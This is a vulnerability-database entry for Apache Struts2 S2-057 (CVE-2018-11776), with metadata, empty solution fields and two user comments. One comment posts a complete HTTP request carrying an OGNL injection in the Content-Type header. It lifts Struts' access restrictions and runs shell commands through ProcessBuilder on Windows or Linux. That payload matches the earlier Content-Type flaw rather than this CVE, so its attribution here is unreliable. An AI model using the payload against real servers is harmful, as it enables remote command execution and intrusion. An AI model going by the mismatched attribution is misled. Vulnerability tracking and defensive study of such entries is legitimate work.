Apache Struts2 S2-057(CVE-2018-11776)

Basic Fields

SSV ID:
SSV-97497
Find Time:
Unknown
Submit Time:
2018-08-22
Level:
Category:
命令执行
Component:
Apache Struts
(Affected version more, click here)
Author:
Man Yue Mo
Submitter:
Knownsec
CVE-ID:
CVE-2018-11776
CNNVD-ID:
Add
CNVD-ID:
Add
ZoomEye Dork:
Add

Source

Detail

Contributor Got  0KB
Loading icon
have 0  exchange

PoC (pocsuite 插件) (pocsuite 插件)

Contributor Knownsec totally have   0KB
Unopen
have 0 Exchange

Reference Linking

Solutions

Temp Solutions

Unavailable Temp Solutions

Official Solution

Defense Solutions

Unavailable Defense Solutions

Popularity 8947
Need to bind phone before comment. Bind Now

All Comments (2)

  • GET /index.action HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) Accept: */* Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c','echo windows--2017'}:{'/bin/bash','-c','echo linux--2017'})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} Host: 127.0.0.1:8080 Connection: Keep-Alive
    2F
  • where is POC ?
    1F

※Any content provided by this site, only to learn the code and services, not for illegal purposes